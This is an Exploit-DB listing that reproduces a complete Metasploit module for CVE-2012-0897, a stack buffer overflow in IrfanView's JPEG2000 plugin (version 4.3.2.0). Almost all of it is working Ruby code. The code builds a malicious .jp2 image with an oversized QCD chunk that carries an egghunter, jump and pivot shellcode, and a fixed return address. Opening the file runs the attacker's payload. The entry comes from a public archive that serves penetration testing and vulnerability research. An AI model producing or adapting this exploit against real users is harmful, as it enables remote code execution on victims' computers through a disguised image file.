IrfanView JPEG2000 4.3.2.0 - jp2 Stack Buffer Overflow (Metasploit)

EDB-ID:

19519


Author:

Metasploit

Type:

local


Platform:

Windows

Date:

2012-07-01


##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow vulnerability in
				version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been
				tested on a specific version of irfanview (v4.3.2), although other versions may
				work also. The vulnerability is triggered via parsing an invalid qcd chunk
				structure and specifying a malformed qcd size and data.

				Payload delivery and vulnerability trigger can be executed in multiple ways.
				The user can double click the file, use the file dialog, open via the icon
				and drag/drop the file into Irfanview\'s window. An egg hunter is used for
				stability.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery
					'mr_me <steventhomasseeley[at]gmail.com>',    # msf-fu
					'juan vazquez'                                # more improvements
				],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2012-0897' ],
					[ 'OSVDB', '78333'],
					[ 'BID', '51426' ],
					[ 'URL', 'http://www.greyhathacker.net/?p=525' ],
				],
			'Platform'          => [ 'win' ],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Payload'           =>
				{
					'Space'    => 4000,
					'DisableNops' => true,
				},
			'Targets'        =>
				[
					# push esp; retn [i_view32.exe]
					# http://www.oldapps.com/irfanview.php?old_irfanview=7097
					# http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe
					[ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]
				],
			'DisclosureDate' => 'Jan 16 2012',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),
				], self.class)
	end

	# encode our string like unicode except we are not using nulls
	def encode_bytes(raw_bytes)
		encoded_bytes = ""
		0.step(raw_bytes.length-1, 2) { |i|
			encoded_bytes << raw_bytes[i+1]
			encoded_bytes << raw_bytes[i]
		}
		return encoded_bytes
	end

	def exploit
		jp2  = ""
		jp2 << "\x00\x00\x00\x0c"         #
		jp2 << "\x6a\x50\x20\x20"         # [jP  ] <0x6a502020> magic 0xd0a870a,len 12
		jp2 << "\x0d\x0a\x87\x0a"         #
		jp2 << "\x00\x00\x00\x14"         #
		jp2 << "\x66\x74\x79\x70"         #
		jp2 << "\x6a\x70\x32\x20"         #
		jp2 << "\x00\x00\x00\x00"         #         MinorVersion = 0      = [\0\0\0\0]
		jp2 << "\x6a\x70\x32\x20"         #         Compat = 0x6a703220 = [jp2 ]
		jp2 << "\x00\x00\x00\x38"         #
		jp2 << "\x75\x75\x69\x64"         # [uuid] <0x75756964> len 56 data offset 8
		jp2 << "\x61\x70\x00\xde\xec\x87" # 56 bytes with start and end tags
		jp2 << "\xd5\x11\xb2\xed\x00\x50" #
		jp2 << "\x04\x71\xfd\xdc\xd2\x00" #
		jp2 << "\x00\x00\x40\x01\x00\x00" #
		jp2 << "\x00\x00\x00\x00\x60\x09" #
		jp2 << "\x00\x00\x00\x00\x00\x00" #
		jp2 << "\x00\x00\x00\x00\x00\x00" #
		jp2 << "\x00\x00\x30\x00\x00\x00" #
		jp2 << "\x00\x00\x00\x2d"         #
		jp2 << "\x6a\x70\x32\x68"         # [jp2h] <0x6a703268> len 45 data offset 8
		jp2 << "\x00\x00\x00\x16"         #
		jp2 << "\x69\x68\x64\x72"         # [ihdr] <0x69686472> len 22 data offset 8
		jp2 << "\x00\x00\x00\x0a"         #         ImageHeight = 10
		jp2 << "\x00\x00\x00\x0a"         #         ImageWidth = 10
		jp2 << "\x00\x03"                 #         NumberOfComponents = 3
		jp2 << "\x07"                     #         BitsPerComponent = 7
		jp2 << "\x07"                     #         Compression = 7
		jp2 << "\x01"                     #         Colorspace = 0x1 = unknown
		jp2 << "\x00\x00\x00\x00\x0f"     #
		jp2 << "\x63\x6f\x6c\x72"         # [colr] <0x636f6c72> len 15 data offset 8
		jp2 << "\x01"                     #         Method = 1
		jp2 << "\x00"                     #         Precedence = 0
		jp2 << "\x00"                     #         ColorSpaceAproximation = 0
		jp2 << "\x00\x00\x00"             #         EnumeratedColorSpace = 16 = sRGB
		jp2 << "\x10\x00\x00\x00\x00"     #
		jp2 << "\x6a\x70\x32\x63"         # [jp2c] <0x6a703263> length 0 data offset 8
		jp2 << "\xff\x4f"                 # <0xff4f=JP2C_SOC> Start of codestream
		jp2 << "\xff\x51"                 # <0xff51=JP2C_SIZ> length 47
		jp2 << "\x00\x2f"                 #         47 bytes
		jp2 << "\x00\x00"                 #         Capabilities = 0
		jp2 << "\x00\x00\x00\x0a"         #         GridWidth = 10
		jp2 << "\x00\x00\x00\x0a"         #         GridHeight = 10
		jp2 << "\x00\x00\x00\x00"         #         XImageOffset = 0
		jp2 << "\x00\x00\x00\x00"         #         YImageOffset = 0
		jp2 << "\x00\x00\x00\x0a"         #         TileWidth = 10
		jp2 << "\x00\x00\x00\x0a"         #         TileHeight = 10
		jp2 << "\x00\x00\x00\x00"         #         Xtileoffset = 0
		jp2 << "\x00\x00\x00\x00"         #         Ytileoffset = 0
		jp2 << "\x00\x03"                 #         NumberOfComponents = 3
		jp2 << "\x07\x01\x01"             #   Component0Pr=0x7=8 bits un,hsep=1,vsep=1
		jp2 << "\x07\x01\x01"             #   Component0Pr=0x7=8 bits un,hsep=1,vsep=1
		jp2 << "\x07\x01\x01"             #   Component0Pr=0x7=8 bits un,hsep=1,vsep=1
		jp2 << "\xff\x52"                 # <0xff52=JP2C_COD> length 12
		jp2 << "\x00\x0c"                 #   12 bytes
		jp2 << "\x00"                     #   codingStyle=0=entropy coder w/o partition
		jp2 << "\x00"                     #   ProgressionOrder = 0
		jp2 << "\x00\x05"                 #   NumberOfLayers = 0x5
		jp2 << "\x01"                     #   MultiComponentTransform=0x1=5/3 reversible
		jp2 << "\x05"                     #   DecompLevels = 5
		jp2 << "\x04"                     #   CodeBlockWidthExponent=0x4+2 # cbw ->64
		jp2 << "\x04"                     #   CodeBlockHeightExponent=0x4+2 # cbh ->64
		jp2 << "\x00"                     #   CodeBLockStyle = 0
		jp2 << "\x00"                     #   QMIFBankId = 0

		eggoptions =
		{
			:checksum => false,
			:eggtag => 'pwnd'
		}

		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
		qcd_data  = ""
		qcd_data << make_nops(10)
		qcd_data << encode_bytes(hunter)
		qcd_data << rand_text_alpha(146)

		jmp_hunter = %q{
			jmp $-0xad
			inc ecx
		}

		# jump to our egghunter
		jmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string

		qcd_data << encode_bytes(jmp_hunter)
		qcd_data << rand_text_alpha(196-qcd_data.length)
		qcd_data << encode_bytes([target.ret].pack("V"))

		# align ecx and jmp
		pivot = %q{
			inc ch
			jmp ecx
		}

		pivot  = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string

		qcd_data << encode_bytes(pivot)
		qcd_data << egg

		jp2 << "\xff\x5c"                         # start
		jp2 << "\x00\xf5"                         # arbitrary size to trigger overflow
		jp2 << "\x22"                             # guard
		jp2 << qcd_data                           # malicious code
		jp2 << "\xff\x90"                         # <0xff90=JP2C_SOT>len 10
		jp2 << "\x00\x0a"                         # 10 bytes
		jp2 << "\x00\x00\x00\x00\x00\x68\x00\x01"
		jp2 << "\xff\x93"                         # <0xff93=JP2C_SOD> Start of data
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
		jp2 << "\x80\x80"
		jp2 << "\xff\xd9"

		# Create the file
		print_status("Creating '#{datastore['FILENAME']}' file...")

		file_create(jp2)
	end

end